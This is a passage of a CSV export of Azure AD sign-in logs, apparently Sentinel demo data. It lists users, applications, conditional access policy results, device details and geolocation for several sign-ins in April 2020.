{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:41,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",61a47a2b-187e-4a1d-b943-278ff5b63d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,61a47a2b-187e-4a1d-b943-278ff5b63d00,SigninLogs,Sucess,35.01296997,-80.93171692
+1333,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,41:25.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:41,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",0b375f87-6c9c-4475-aea3-7ebc49a13b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,0b375f87-6c9c-4475-aea3-7ebc49a13b00,SigninLogs,Sucess,35.01296997,-80.93171692
+1334,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,41:21.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,73b1eb1d-c50b-46fb-b322-f65fb404fab2,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,ACOM Azure Website,23523755-3a2b-41ca-9315-f81f3f566a95,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:41,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",83c51857-7201-49ae-a590-3f95ba581300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,83c51857-7201-49ae-a590-3f95ba581300,SigninLogs,Sucess,50.6406517,5.572050095
+1335,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,41:25.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,deccc428-3fda-4bc3-ba19-f0967fea0563,Microsoft.aadiam,Microsoft.aadiam,,Chris Boehm,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 12:41,"{'operatingSystem': 'Windows 10', 'deviceId': 'd6dd34c4-e1a4-4486-bd7b-115b5de752fb', 'browser': 'Edge 18.1836', 'displayName': 'CALMENTROPY', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",0b375f87-6c9c-4475-aea3-7ebc49a13b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},Chris Boehm,8c102503-0f98-4b9b-9b4a-ebb56d14c66a,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,0b375f87-6c9c-4475-aea3-7ebc49a13b00,SigninLogs,Sucess,35.01296997,-80.93171692
+1336,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,35:02.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b758eb04-f3da-4f4f-8557-ead6472e790a,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:35,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5ef5316a-deee-4f03-8fd7-4abf6c960b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,5ef5316a-deee-4f03-8fd7-4abf6c960b00,SigninLogs,Sucess,50.6406517,5.572050095
+1337,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,41:21.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,73b1eb1d-c50b-46fb-b322-f65fb404fab2,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,ACOM Azure Website,23523755-3a2b-41ca-9315-f81f3f566a95,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:41,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",83c51857-7201-49ae-a590-3f95ba581300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,83c51857-7201-49ae-a590-3f95ba581300,SigninLogs,Sucess,50.6406517,5.572050095
+1338,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,15:15.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 05:15,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",92c2001d-49e6-496a-951e-7f1940280500,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,92c2001d-49e6-496a-951e-7f1940280500,SigninLogs,Sucess,33.0175209,35.44601059
+1339,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,15:15.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 05:15,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",92c2001d-49e6-496a-951e-7f1940280500,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,92c2001d-49e6-496a-951e-7f1940280500,SigninLogs,Sucess,33.0175209,35.44601059
+1340,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,18:05.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cfcf3990-7152-4749-81ff-b96f50d59f00,Microsoft.aadiam,Microsoft.aadiam,,Sentinel Partner Account 6,4,IN,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 